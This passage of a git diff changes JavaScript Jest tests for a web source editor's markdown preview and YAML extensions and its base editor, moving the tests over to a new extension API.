+ setFixtures('<div id="editor" data-editor-loading></div>'); + editorEl = document.getElementById('editor'); + editor = new SourceEditor(); + instance = editor.createInstance({ + el: editorEl, + blobPath: markdownPath, + blobContent: text, + }); + extension = instance.use({ + definition: EditorMarkdownPreviewExtension, + setupOptions: { previewMarkdownPath }, + }); + panelSpy = jest.spyOn(extension.obj.constructor.prototype, 'togglePreviewPanel'); + }); + + afterEach(() => { + instance.dispose(); + editorEl.remove(); + mockAxios.restore(); + }); + + it('sets up the preview on the instance', () => { + expect(instance.markdownPreview).toEqual({ + el: undefined, + action: expect.any(Object), + shown: false, + modelChangeListener: undefined, + path: previewMarkdownPath, + }); + }); + + describe('model language changes listener', () => { + let cleanupSpy; + let actionSpy; + + beforeEach(async () => { + cleanupSpy = jest.fn(); + actionSpy = jest.fn(); + spyOnApi(extension, { + cleanup: cleanupSpy, + setupPreviewAction: actionSpy, + }); + await togglePreview(); + }); + + afterEach(() => { + jest.clearAllMocks(); + }); + + it('cleans up when switching away from markdown', () => { + expect(cleanupSpy).not.toHaveBeenCalled(); + expect(actionSpy).not.toHaveBeenCalled(); + + instance.updateModelLanguage(plaintextPath); + + expect(cleanupSpy).toHaveBeenCalled(); + expect(actionSpy).not.toHaveBeenCalled(); + }); + + it.each` + oldLanguage | newLanguage | setupCalledTimes + ${'plaintext'} | ${'markdown'} | ${1} + ${'markdown'} | ${'markdown'} | ${0} + ${'markdown'} | ${'plaintext'} | ${0} + ${'markdown'} | ${undefined} | ${0} + ${undefined} | ${'markdown'} | ${1} + `( + 'correctly handles re-enabling of the action when switching from $oldLanguage to $newLanguage', + ({ oldLanguage, newLanguage, setupCalledTimes } = {}) => { + expect(actionSpy).not.toHaveBeenCalled(); + instance.updateModelLanguage(oldLanguage); + instance.updateModelLanguage(newLanguage); + expect(actionSpy).toHaveBeenCalledTimes(setupCalledTimes); + }, + ); + }); + + describe('model change listener', () => { + let cleanupSpy; + let actionSpy; + + beforeEach(() => { + cleanupSpy = jest.fn(); + actionSpy = jest.fn(); + spyOnApi(extension, { + cleanup: cleanupSpy, + setupPreviewAction: actionSpy, + }); + instance.togglePreview(); + }); + + afterEach(() => { + jest.clearAllMocks(); + }); + + it('does not do anything if there is no model', () => { + instance.setModel(null); + + expect(cleanupSpy).not.toHaveBeenCalled(); + expect(actionSpy).not.toHaveBeenCalled(); + }); + + it('cleans up the preview when the model changes', () => { + instance.setModel(monacoEditor.createModel('foo')); + expect(cleanupSpy).toHaveBeenCalled(); + }); + + it.each` + language | setupCalledTimes + ${'markdown'} | ${1} + ${'plaintext'} | ${0} + ${undefined} | ${0} + `( + 'correctly handles actions when the new model is $language', + ({ language, setupCalledTimes } = {}) => { + instance.setModel(monacoEditor.createModel('foo', language)); + + expect(actionSpy).toHaveBeenCalledTimes(setupCalledTimes); + }, + ); + }); + + describe('cleanup', () => { + beforeEach(async () => { + mockAxios.onPost().reply(200, { body: responseData }); + await togglePreview(); + }); + + it('disposes the modelChange listener and does not fetch preview on content changes', () => { + expect(instance.markdownPreview.modelChangeListener).toBeDefined(); + const fetchPreviewSpy = jest.fn(); + spyOnApi(extension, { + fetchPreview: fetchPreviewSpy, + }); + + instance.cleanup(); + instance.setValue('Foo Bar'); + jest.advanceTimersByTime(EXTENSION_MARKDOWN_PREVIEW_UPDATE_DELAY); + + expect(fetchPreviewSpy).not.toHaveBeenCalled(); + }); + + it('removes the contextual menu action', () => { + expect(instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID)).toBeDefined(); + + instance.cleanup(); + + expect(instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID)).toBe(null); + }); + + it('toggles the `shown` flag', () => { + expect(instance.markdownPreview.shown).toBe(true); + instance.cleanup(); + expect(instance.markdownPreview.shown).toBe(false); + }); + + it('toggles the panel only if the preview is visible', () => { + const { el: previewEl } = instance.markdownPreview; + const parentEl = previewEl.parentElement; + + expect(previewEl).toBeVisible(); + expect(parentEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe(true); + + instance.cleanup(); + expect(previewEl).toBeHidden(); + expect(parentEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( + false, + ); + + instance.cleanup(); + expect(previewEl).toBeHidden(); + expect(parentEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( + false, + ); + }); + + it('toggles the layout only if the preview is visible', () => { + const { width } = instance.getLayoutInfo(); + + expect(instance.markdownPreview.shown).toBe(true); + + instance.cleanup(); + + const { width: newWidth } = instance.getLayoutInfo(); + expect(newWidth === width / EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH).toBe(true); + + instance.cleanup(); + expect(newWidth === width / EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH).toBe(true); + }); + }); + + describe('fetchPreview', () => { + const fetchPreview = async () => { + instance.fetchPreview(); + await waitForPromises(); + }; + + let previewMarkdownSpy; + + beforeEach(() => { + previewMarkdownSpy = jest.fn().mockImplementation(() => [200, { body: responseData }]); + mockAxios.onPost(previewMarkdownPath).replyOnce((req) => previewMarkdownSpy(req)); + }); + + it('correctly fetches preview based on previewMarkdownPath', async () => { + await fetchPreview(); + + expect(previewMarkdownSpy).toHaveBeenCalledWith( + expect.objectContaining({ data: JSON.stringify({ text }) }), + ); + }); + + it('puts the fetched content into the preview DOM element', async () => { + instance.markdownPreview.el = editorEl.parentElement; + await fetchPreview(); + expect(instance.markdownPreview.el.innerHTML).toEqual(responseData); + }); + + it('applies syntax highlighting to the preview content', async () => { + instance.markdownPreview.el = editorEl.parentElement; + await fetchPreview(); + expect(syntaxHighlight).toHaveBeenCalled(); + }); + + it('catches the errors when fetching the preview', async () => { + mockAxios.onPost().reply(500); + + await fetchPreview(); + expect(createFlash).toHaveBeenCalled(); + }); + }); + + describe('setupPreviewAction', () => { + it('adds the contextual menu action', () => { + expect(instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID)).toBeDefined(); + }); + + it('does not set up action if one already exists', () => { + jest.spyOn(instance, 'addAction').mockImplementation(); + + instance.setupPreviewAction(); + expect(instance.addAction).not.toHaveBeenCalled(); + }); + + it('toggles preview when the action is triggered', () => { + const togglePreviewSpy = jest.fn(); + spyOnApi(extension, { + togglePreview: togglePreviewSpy, + }); + + expect(togglePreviewSpy).not.toHaveBeenCalled(); + + const action = instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID); + action.run(); + + expect(togglePreviewSpy).toHaveBeenCalled(); + }); + }); + + describe('togglePreview', () => { + beforeEach(() => { + mockAxios.onPost().reply(200, { body: responseData }); + }); + + it('toggles preview flag on instance', () => { + expect(instance.markdownPreview.shown).toBe(false); + + instance.togglePreview(); + expect(instance.markdownPreview.shown).toBe(true); + + instance.togglePreview(); + expect(instance.markdownPreview.shown).toBe(false); + }); + + describe('panel DOM element set up', () => { + it('sets up an element to contain the preview and stores it on instance', () => { + expect(instance.markdownPreview.el).toBeUndefined(); + + instance.togglePreview(); + + expect(instance.markdownPreview.el).toBeDefined(); + expect( + instance.markdownPreview.el.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_CLASS), + ).toBe(true); + }); + + it('re-uses existing preview DOM element on repeated calls', () => { + instance.togglePreview(); + const origPreviewEl = instance.markdownPreview.el; + instance.togglePreview(); + + expect(instance.markdownPreview.el).toBe(origPreviewEl); + }); + + it('hides the preview DOM element by default', () => { + panelSpy.mockImplementation(); + instance.togglePreview(); + expect(instance.markdownPreview.el.style.display).toBe('none'); + }); + }); + + describe('preview layout setup', () => { + it('sets correct preview layout', () => { + jest.spyOn(instance, 'layout'); + const { width, height } = instance.getLayoutInfo(); + + instance.togglePreview(); + + expect(instance.layout).toHaveBeenCalledWith({ + width: width * EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH, + height, + }); + }); + }); + + describe('preview panel', () => { + it('toggles preview CSS class on the editor', () => { + expect(editorEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( + false, + ); + instance.togglePreview(); + expect(editorEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( + true, + ); + instance.togglePreview(); + expect(editorEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( + false, + ); + }); + + it('toggles visibility of the preview DOM element', async () => { + await togglePreview(); + expect(instance.markdownPreview.el.style.display).toBe('block'); + await togglePreview(); + expect(instance.markdownPreview.el.style.display).toBe('none'); + }); + + describe('hidden preview DOM element', () => { + it('listens to model changes and re-fetches preview', async () => { + expect(mockAxios.history.post).toHaveLength(0); + await togglePreview(); + expect(mockAxios.history.post).toHaveLength(1); + + instance.setValue('New Value'); + await waitForPromises(); + expect(mockAxios.history.post).toHaveLength(2); + }); + + it('stores disposable listener for model changes', async () => { + expect(instance.markdownPreview.modelChangeListener).toBeUndefined(); + await togglePreview(); + expect(instance.markdownPreview.modelChangeListener).toBeDefined(); + }); + }); + + describe('already visible preview', () => { + beforeEach(async () => { + await togglePreview(); + mockAxios.resetHistory(); + }); + + it('does not re-fetch the preview', () => { + instance.togglePreview(); + expect(mockAxios.history.post).toHaveLength(0); + }); + + it('disposes the model change event listener', () => { + const disposeSpy = jest.fn(); + instance.markdownPreview.modelChangeListener = { + dispose: disposeSpy, + }; + instance.togglePreview(); + expect(disposeSpy).toHaveBeenCalled(); + }); + }); + }); + }); +}); diff --git a/spec/frontend/editor/source_editor_spec.js b/spec/frontend/editor/source_editor_spec.js index d87d373c952..bc53202c919 100644 --- a/spec/frontend/editor/source_editor_spec.js +++ b/spec/frontend/editor/source_editor_spec.js @@ -1,16 +1,28 @@ -/* eslint-disable max-classes-per-file */ import { editor as monacoEditor, languages as monacoLanguages } from 'monaco-editor'; -import waitForPromises from 'helpers/wait_for_promises'; import { SOURCE_EDITOR_INSTANCE_ERROR_NO_EL, URI_PREFIX, EDITOR_READY_EVENT, } from '~/editor/constants'; -import { SourceEditorExtension } from '~/editor/extensions/source_editor_extension_base'; import SourceEditor from '~/editor/source_editor'; import { DEFAULT_THEME, themes } from '~/ide/lib/themes'; import { joinPaths } from '~/lib/utils/url_utility'; +jest.mock('~/helpers/startup_css_helper', () => { + return { + waitForCSSLoaded: jest.fn().mockImplementation((cb) => { + // We have to artificially put the callback's execution + // to the end of the current call stack to be able to + // test that the callback is called after waitForCSSLoaded. + // setTimeout with 0 delay does exactly that. + // Otherwise we might end up with false positive results + setTimeout(() => { + cb.apply(); + }, 0); + }), + }; +}); + describe('Base editor', () => { let editorEl; let editor; @@ -19,7 +31,6 @@ describe('Base editor', () => { const blobContent = 'Foo Bar'; const blobPath = 'test.md'; const blobGlobalId = 'snippet_777'; - const fakeModel = { foo: 'bar', dispose: jest.fn() }; beforeEach(() => { setFixtures('<div id="editor" data-editor-loading></div>'); @@ -52,16 +63,6 @@ describe('Base editor', () => { describe('instance of the Source Editor', () => { let modelSpy; let instanceSpy; - const setModel = jest.fn(); - const dispose = jest.fn(); - const mockModelReturn = (res = fakeModel) => { - modelSpy = jest.spyOn(monacoEditor, 'createModel').mockImplementation(() => res); - }; - const mockDecorateInstance = (decorations = {}) => { - jest.spyOn(SourceEditor, 'convertMonacoToELInstance').mockImplementation((inst) => { - return Object.assign(inst, decorations); - }); - }; beforeEach(() => { modelSpy = jest.spyOn(monacoEditor, 'createModel'); @@ -73,46 +74,38 @@ describe('Base editor', () => { }); it('throws an error if no dom element is supplied', () => { - mockDecorateInstance(); - expect(() => { + const create = () => { editor.createInstance(); - }).toThrow(SOURCE_EDITOR_INSTANCE_ERROR_NO_EL); + }; + expect(create).toThrow(SOURCE_EDITOR_INSTANCE_ERROR_NO_EL); expect(modelSpy).not.toHaveBeenCalled(); expect(instanceSpy).not.toHaveBeenCalled(); - expect(SourceEditor.convertMonacoToELInstance).not.toHaveBeenCalled(); }); - it('creates model to be supplied to Monaco editor', () => { - mockModelReturn(); - mockDecorateInstance({ - setModel, - }); - editor.createInstance(defaultArguments); + it('creates model and attaches it to the instance', () => { + jest.spyOn(monacoEditor, 'createModel'); + const instance = editor.createInstance(defaultArguments); - expect(modelSpy).toHaveBeenCalledWith( + expect(monacoEditor.createModel).toHaveBeenCalledWith( blobContent, undefined, expect.objectContaining({ path: uriFilePath, }), ); - expect(setModel).toHaveBeenCalledWith(fakeModel); + expect(instance.getModel().getValue()).toEqual(defaultArguments.blobContent); }); it('does not create a model automatically if model is passed as `null`', () => { - mockDecorateInstance({ - setModel, - }); - editor.createInstance({ ...defaultArguments, model: null }); - expect(modelSpy).not.toHaveBeenCalled(); - expect(setModel).not.toHaveBeenCalled(); + const instance = editor.createInstance({ ...defaultArguments, model: null }); + expect(instance.getModel()).toBeNull(); }); it('initializes the instance on a supplied DOM node', () => { editor.createInstance({ el: editorEl }); - expect(editor.editorEl).not.toBe(null); + expect(editor.editorEl).not.toBeNull(); expect(instanceSpy).toHaveBeenCalledWith(editorEl, expect.anything()); }); @@ -143,32 +136,43 @@ describe('Base editor', () => { }); it('disposes instance when the global editor is disposed', () => { - mockDecorateInstance({ - dispose, - }); - editor.createInstance(defaultArguments); + const instance = editor.createInstance(defaultArguments); + instance.dispose = jest.fn(); - expect(dispose).not.toHaveBeenCalled(); + expect(instance.dispose).not.toHaveBeenCalled(); editor.dispose(); - expect(dispose).toHaveBeenCalled(); + expect(instance.dispose).toHaveBeenCalled(); }); it("removes the disposed instance from the global editor's storage and disposes the associated model", () => { - mockModelReturn(); - mockDecorateInstance({ - setModel, - }); const instance = editor.createInstance(defaultArguments); expect(editor.instances).toHaveLength(1); - expect(fakeModel.dispose).not.toHaveBeenCalled(); + expect(instance.getModel()).not.toBeNull(); instance.dispose(); expect(editor.instances).toHaveLength(0); - expect(fakeModel.dispose).toHaveBeenCalled(); + expect(instance.getModel()).toBeNull(); + }); + + it('resets the layout in waitForCSSLoaded callback', async () => { + const layoutSpy = jest.fn(); + jest.spyOn(monacoEditor, 'create').mockReturnValue({ + layout: layoutSpy, + setModel: jest.fn(), + onDidDispose: jest.fn(), + dispose: jest.fn(), + }); + editor.createInstance(defaultArguments); + expect(layoutSpy).not.toHaveBeenCalled(); + + // We're waiting for the waitForCSSLoaded mock to kick in + await jest.runOnlyPendingTimers(); + + expect(layoutSpy).toHaveBeenCalled(); }); }); @@ -214,26 +218,17 @@ describe('Base editor', () => { }); it('correctly disposes the diff editor model', () => { - const modifiedModel = fakeModel; - const originalModel = { ...fakeModel }; - mockDecorateInstance({ - getModel: jest.fn().mockReturnValue({ - original: originalModel, - modified: modifiedModel, - }), - }); - const instance = editor.createDiffInstance({ ...defaultArguments, blobOriginalContent }); expect(editor.instances).toHaveLength(1); - expect(originalModel.dispose).not.toHaveBeenCalled(); - expect(modifiedModel.dispose).not.toHaveBeenCalled(); + expect(instance.getOriginalEditor().getModel()).not.toBeNull(); + expect(instance.getModifiedEditor().getModel()).not.toBeNull(); instance.dispose(); expect(editor.instances).toHaveLength(0); - expect(originalModel.dispose).toHaveBeenCalled(); - expect(modifiedModel.dispose).toHaveBeenCalled(); + expect(instance.getOriginalEditor().getModel()).toBeNull(); + expect(instance.getModifiedEditor().getModel()).toBeNull(); }); }); }); @@ -355,282 +350,19 @@ describe('Base editor', () => { expect(instance.getValue()).toBe(blobContent); }); - it('is capable of changing the language of the model', () => { - // ignore warnings and errors Monaco posts during setup - // (due to being called from Jest/Node.js environment) - jest.spyOn(console, 'warn').mockImplementation(() => {}); - jest.spyOn(console, 'error').mockImplementation(() => {}); - - const blobRenamedPath = 'test.js'; - - expect(instance.getModel().getLanguageIdentifier().language).toBe('markdown'); - instance.updateModelLanguage(blobRenamedPath); - - expect(instance.getModel().getLanguageIdentifier().language).toBe('javascript'); - }); - - it('falls back to plaintext if there is no language associated with an extension', () => { - const blobRenamedPath = 'test.myext'; - const spy = jest.spyOn(console, 'error').mockImplementation(() => {}); - - instance.updateModelLanguage(blobRenamedPath); - - expect(spy).not.toHaveBeenCalled(); - expect(instance.getModel().getLanguageIdentifier().language).toBe('plaintext'); - }); - }); - - describe('extensions', () => { - let instance; - const alphaRes = jest.fn(); - const betaRes = jest.fn(); - const fooRes = jest.fn(); - const barRes = jest.fn(); - class AlphaClass { - constructor() { - this.res = alphaRes; - } - alpha() { - return this?.nonExistentProp || alphaRes; - } - } - class BetaClass { - beta() { - return this?.nonExistentProp || betaRes; - } - } - class WithStaticMethod { - constructor({ instance: inst, ...options } = {}) { - Object.assign(inst, options); - } - static computeBoo(a) { - return a + 1; - } - boo() { - return WithStaticMethod.computeBoo(this.base); - } - } - class WithStaticMethodExtended extends SourceEditorExtension { - static computeBoo(a) { - return a + 1; - } - boo() { - return WithStaticMethodExtended.computeBoo(this.base); - } - } - const AlphaExt = new AlphaClass(); - const BetaExt = new BetaClass(); - const FooObjExt = { - foo() { - return fooRes; - }, - }; - const BarObjExt = { - bar() { - return barRes; - }, - }; - - describe('basic functionality', () => { - beforeEach(() => { - instance = editor.createInstance({ el: editorEl, blobPath, blobContent }); - }); - - it('does not fail if no extensions supplied', () => { - const spy = jest.spyOn(global.console, 'error'); - instance.use(); - - expect(spy).not.toHaveBeenCalled(); - }); - - it("does not extend instance with extension's constructor", () => { - expect(instance.constructor).toBeDefined(); - const { constructor } = instance; - - expect(AlphaExt.constructor).toBeDefined(); - expect(AlphaExt.constructor).not.toEqual(constructor); - - instance.use(AlphaExt); - expect(instance.constructor).toBe(constructor); - }); - - it.each` - type | extensions | methods | expectations - ${'ES6 classes'} | ${AlphaExt} | ${['alpha']} | ${[alphaRes]} - ${'multiple ES6 classes'} | ${[AlphaExt, BetaExt]} | ${['alpha', 'beta']} | ${[alphaRes, betaRes]} - ${'simple objects'} | ${FooObjExt} | ${['foo']} | ${[fooRes]} - ${'multiple simple objects'} | ${[FooObjExt, BarObjExt]} | ${['foo', 'bar']} | ${[fooRes, barRes]} - ${'combination of ES6 classes and objects'} | ${[AlphaExt, BarObjExt]} | ${['alpha', 'bar']} | ${[alphaRes, barRes]} - `('is extensible with $type', ({ extensions, methods, expectations } = {}) => { - methods.forEach((method) => { - expect(instance[method]).toBeUndefined(); - }); - - instance.use(extensions); - - methods.forEach((method) => { - expect(instance[method]).toBeDefined(); - }); - - expectations.forEach((expectation, i) => { - expect(instance[methods[i]].call()).toEqual(expectation); - }); - }); - - it('does not extend instance with private data of an extension', () => { - const ext = new WithStaticMethod({ instance }); - ext.staticMethod = () => { - return 'foo'; - }; - ext.staticProp = 'bar'; - - expect(instance.boo).toBeUndefined(); - expect(instance.staticMethod).toBeUndefined(); - expect(instance.staticProp).toBeUndefined(); - - instance.use(ext); - - expect(instance.boo).toBeDefined(); - expect(instance.staticMethod).toBeUndefined(); - expect(instance.staticProp).toBeUndefined(); - }); - - it.each([WithStaticMethod, WithStaticMethodExtended])( - 'properly resolves data for an extension with private data', - (ExtClass) => { - const base = 1; - expect(instance.base).toBeUndefined(); - expect(instance.boo).toBeUndefined(); - - const ext = new ExtClass({ instance, base }); - - instance.use(ext); - expect(instance.base).toBe(1); - expect(instance.boo()).toBe(2); - }, - ); - - it('uses the last definition of a method in case of an overlap', () => { - const FooObjExt2 = { foo: 'foo2' }; - instance.use([FooObjExt, BarObjExt, FooObjExt2]); - expect(instance).toMatchObject({ - foo: 'foo2', - ...BarObjExt, - }); - }); - - it('correctly resolves references withing extensions', () => { - const FunctionExt = { - inst() { - return this; - }, - mod() { - return this.getModel(); - }, + it('emits the EDITOR_READY_EVENT event after setting up the instance', () => { + jest.spyOn(monacoEditor, 'create').mockImplementation(() => { + return { + setModel: jest.fn(), + onDidDispose: jest.fn(), + layout: jest.fn(), }; - instance.use(FunctionExt); - expect(instance.inst()).toEqual(editor.instances[0]); - }); - }); - - describe('extensions as an instance parameter', () => { - let editorExtensionSpy; - const instanceConstructor = (extensions = []) => { - return editor.createInstance({ - el: editorEl, - blobPath, - blobContent, - extensions, - }); - }; - - beforeEach(() => { - editorExtensionSpy = jest - .spyOn(SourceEditor, 'pushToImportsArray') - .mockImplementation((arr) => { - arr.push( - Promise.resolve({ - default: {}, - }), - ); - }); - }); - - it.each([undefined, [], [''], ''])( - 'does not fail and makes no fetch if extensions is %s', - () => { - instance = instanceConstructor(null); - expect(editorExtensionSpy).not.toHaveBeenCalled(); - }, - ); - - it.each` - type | value | callsCount - ${'simple string'} | ${'foo'} | ${1} - ${'combined string'} | ${'foo, bar'} | ${2} - ${'array of strings'} | ${['foo', 'bar']} | ${2} - `('accepts $type as an extension parameter', ({ value, callsCount }) => { - instance = instanceConstructor(value); - expect(editorExtensionSpy).toHaveBeenCalled(); - expect(editorExtensionSpy.mock.calls).toHaveLength(callsCount); - }); - - it.each` - desc | path | expectation - ${'~/editor'} | ${'foo'} | ${'~/editor/foo'} - ${'~/CUSTOM_PATH with leading slash'} | ${'/my_custom_path/bar'} | ${'~/my_custom_path/bar'} - ${'~/CUSTOM_PATH without leading slash'} | ${'my_custom_path/delta'} | ${'~/my_custom_path/delta'} - `('fetches extensions from $desc path', ({ path, expectation }) => { - instance = instanceConstructor(path); - expect(editorExtensionSpy).toHaveBeenCalledWith(expect.any(Array), expectation); - }); - - it('emits EDITOR_READY_EVENT event after all extensions were applied', async () => { - const calls = []; - const eventSpy = jest.fn().mockImplementation(() => { - calls.push('event'); - }); - const useSpy = jest.fn().mockImplementation(() => { - calls.push('use'); - }); - jest.spyOn(SourceEditor, 'convertMonacoToELInstance').mockImplementation((inst) => { - const decoratedInstance = inst; - decoratedInstance.use = useSpy; - return decoratedInstance; - }); - editorEl.addEventListener(EDITOR_READY_EVENT, eventSpy); - instance = instanceConstructor('foo, bar'); - await waitForPromises(); - expect(useSpy.mock.calls).toHaveLength(2); - expect(calls).toEqual(['use', 'use', 'event']); - }); - }); - - describe('multiple instances', () => { - let inst1; - let inst2; - let editorEl1; - let editorEl2; - - beforeEach(() => { - setFixtures('<div id="editor1"></div><div id="editor2"></div>'); - editorEl1 = document.getElementById('editor1'); - editorEl2 = document.getElementById('editor2'); - inst1 = editor.createInstance({ el: editorEl1, blobPath: `foo-${blobPath}` }); - inst2 = editor.createInstance({ el: editorEl2, blobPath: `bar-${blobPath}` }); - }); - - afterEach(() => { - editor.dispose(); - editorEl1.remove(); - editorEl2.remove(); - }); - - it('extends all instances if no specific instance is passed', () => { - editor.use(AlphaExt); - expect(inst1.alpha()).toEqual(alphaRes); - expect(inst2.alpha()).toEqual(alphaRes); }); + const eventSpy = jest.fn(); + editorEl.addEventListener(EDITOR_READY_EVENT, eventSpy); + expect(eventSpy).not.toHaveBeenCalled(); + editor.createInstance({ el: editorEl }); + expect(eventSpy).toHaveBeenCalled(); }); }); diff --git a/spec/frontend/editor/source_editor_yaml_ext_spec.js b/spec/frontend/editor/source_editor_yaml_ext_spec.js index 97d2b0b21d0..a861d9c7a45 100644 --- a/spec/frontend/editor/source_editor_yaml_ext_spec.js +++ b/spec/frontend/editor/source_editor_yaml_ext_spec.js @@ -2,6 +2,10 @@ import { Document } from 'yaml'; import SourceEditor from '~/editor/source_editor'; import { YamlEditorExtension } from '~/editor/extensions/source_editor_yaml_ext'; import { SourceEditorExtension } from '~/editor/extensions/source_editor_extension_base'; +import { spyOnApi } from 'jest/editor/helpers'; + +let baseExtension; +let yamlExtension; const getEditorInstance = (editorInstanceOptions = {}) => { setFixtures('<div id="editor"></div>'); @@ -16,7 +20,10 @@ const getEditorInstance = (editorInstanceOptions = {}) => { const getEditorInstanceWithExtension = (extensionOptions = {}, editorInstanceOptions = {}) => { setFixtures('<div id="editor"></div>'); const instance = getEditorInstance(editorInstanceOptions); - instance.use(new YamlEditorExtension({ instance, ...extensionOptions })); + [baseExtension, yamlExtension] = instance.use([ + { definition: SourceEditorExtension }, + { definition: YamlEditorExtension, setupOptions: extensionOptions }, + ]); // Remove the below once // https://gitlab.com/gitlab-org/gitlab/-/issues/325992 is resolved @@ -29,19 +36,16 @@ const getEditorInstanceWithExtension = (extensionOptions = {}, editorInstanceOpt describe('YamlCreatorExtension', () => { describe('constructor', () => { - it('saves constructor options', () => { + it('saves setupOptions options on the extension, but does not expose those to instance', () => { + const highlightPath = 'foo'; const instance = getEditorInstanceWithExtension({ - highlightPath: 'foo', + highlightPath, enableComments: true, }); - expect(instance).toEqual( - expect.objectContaining({ - options: expect.objectContaining({ - highlightPath: 'foo', - enableComments: true, - }), - }), - ); + expect(yamlExtension.obj.highlightPath).toBe(highlightPath); + expect(yamlExtension.obj.enableComments).toBe(true); + expect(instance.highlightPath).toBeUndefined(); + expect(instance.enableComments).toBeUndefined(); }); it('dumps values loaded with the model constructor options', () => { @@ -55,7 +59,7 @@ describe('YamlCreatorExtension', () => { it('registers the onUpdate() function', () => { const instance = getEditorInstance(); const onDidChangeModelContent = jest.spyOn(instance, 'onDidChangeModelContent'); - instance.use(new YamlEditorExtension({ instance })); + instance.use({ definition: YamlEditorExtension }); expect(onDidChangeModelContent).toHaveBeenCalledWith(expect.any(Function)); }); @@ -82,21 +86,21 @@ describe('YamlCreatorExtension', () => { it('should call transformComments if enableComments is true', () => { const instance = getEditorInstanceWithExtension({ enableComments: true }); const transformComments = jest.spyOn(YamlEditorExtension, 'transformComments'); - YamlEditorExtension.initFromModel(instance, model); + instance.initFromModel(model); expect(transformComments).toHaveBeenCalled(); }); it('should not call transformComments if enableComments is false', () => { const instance = getEditorInstanceWithExtension({ enableComments: false }); const transformComments = jest.spyOn(YamlEditorExtension, 'transformComments'); - YamlEditorExtension.initFromModel(instance, model); + instance.initFromModel(model); expect(transformComments).not.toHaveBeenCalled(); }); it('should call setValue with the stringified model', () => { const instance = getEditorInstanceWithExtension(); const setValue = jest.spyOn(instance, 'setValue'); - YamlEditorExtension.initFromModel(instance, model); + instance.initFromModel(model); expect(setValue).toHaveBeenCalledWith(doc.toString()); }); }); @@ -240,26 +244,35 @@ foo: it("should call setValue with the stringified doc if the editor's value is empty", () => { const instance = getEditorInstanceWithExtension(); const setValue = jest.spyOn(instance, 'setValue'); - const updateValue = jest.spyOn(instance, 'updateValue'); + const updateValueSpy = jest.fn(); + spyOnApi(yamlExtension, { + updateValue: updateValueSpy, + }); instance.setDoc(doc); expect(setValue).toHaveBeenCalledWith(doc.toString()); - expect(updateValue).not.toHaveBeenCalled(); + expect(updateValueSpy).not.toHaveBeenCalled(); }); it("should call updateValue with the stringified doc if the editor's value is not empty", () => { const instance = getEditorInstanceWithExtension({}, { value: 'asjkdhkasjdh' }); const setValue = jest.spyOn(instance, 'setValue'); - const updateValue = jest.spyOn(instance, 'updateValue'); + const updateValueSpy = jest.fn(); + spyOnApi(yamlExtension, { + updateValue: updateValueSpy, + }); instance.setDoc(doc); expect(setValue).not.toHaveBeenCalled(); - expect(updateValue).toHaveBeenCalledWith(doc.toString()); + expect(updateValueSpy).toHaveBeenCalledWith(instance, doc.toString()); }); it('should trigger the onUpdate method', () => { const instance = getEditorInstanceWithExtension(); - const onUpdate = jest.spyOn(instance, 'onUpdate'); + const onUpdateSpy = jest.fn(); + spyOnApi(yamlExtension, { + onUpdate: onUpdateSpy, + }); instance.setDoc(doc); - expect(onUpdate).toHaveBeenCalled(); + expect(onUpdateSpy).toHaveBeenCalled(); }); }); @@ -320,9 +333,12 @@ foo: it('calls highlight', () => { const highlightPath = 'foo'; const instance = getEditorInstanceWithExtension({ highlightPath }); - instance.highlight = jest.fn(); + // Here we do not spy on the public API method of the extension, but rather + // the public method of the extension's instance. + // This is required based on how `onUpdate` works + const highlightSpy = jest.spyOn(yamlExtension.obj, 'highlight'); instance.onUpdate(); - expect(instance.highlight).toHaveBeenCalledWith(highlightPath); + expect(highlightSpy).toHaveBeenCalledWith(instance, highlightPath); }); }); @@ -350,8 +366,12 @@ foo: beforeEach(() => { instance = getEditorInstanceWithExtension({ highlightPath: highlightPathOnSetup }, { value }); - highlightLinesSpy = jest.spyOn(SourceEditorExtension, 'highlightLines'); - removeHighlightsSpy = jest.spyOn(SourceEditorExtension, 'removeHighlights'); + highlightLinesSpy = jest.fn(); + removeHighlightsSpy = jest.fn(); + spyOnApi(baseExtension, { + highlightLines: highlightLinesSpy, + removeHighlights: removeHighlightsSpy, + }); }); afterEach(() => { @@ -361,7 +381,7 @@ foo: it('saves the highlighted path in highlightPath', () => { const path = 'foo.bar'; instance.highlight(path); - expect(instance.options.highlightPath).toEqual(path); + expect(yamlExtension.obj.highlightPath).toEqual(path); }); it('calls highlightLines with a number of lines', () => { @@ -374,14 +394,14 @@ foo: instance.highlight(null); expect(removeHighlightsSpy).toHaveBeenCalledWith(instance); expect(highlightLinesSpy).not.toHaveBeenCalled(); - expect(instance.options.highlightPath).toBeNull(); + expect(yamlExtension.obj.highlightPath).toBeNull(); }); it('throws an error if path is invalid and does not change the highlighted path', () => { expect(() => instance.highlight('invalidPath[0]')).toThrow( 'The node invalidPath[0] could not be found inside the document.', ); - expect(instance.options.highlightPath).toEqual(highlightPathOnSetup); + expect(yamlExtension.obj.highlightPath).toEqual(highlightPathOnSetup); expect(highlightLinesSpy).not.toHaveBeenCalled(); expect(removeHighlightsSpy).not.toHaveBeenCalled(); }); diff --git a/spec/frontend/emoji/index_spec.js b/spec/frontend/emoji/index_spec.js index 9652c513671..cc037586496 100644 --- a/spec/frontend/emoji/index_spec.js +++ b/spec/frontend/emoji/index_spec.js @@ -1,6 +1,21 @@ -import { emojiFixtureMap, mockEmojiData, initEmojiMock } from 'helpers/emoji'; +import { + emojiFixtureMap, + mockEmojiData, + initEmojiMock, + validEmoji, + invalidEmoji, + clearEmojiMock, +} from 'helpers/emoji'; import { trimText } from 'helpers/text_helper'; -import { glEmojiTag, searchEmoji, 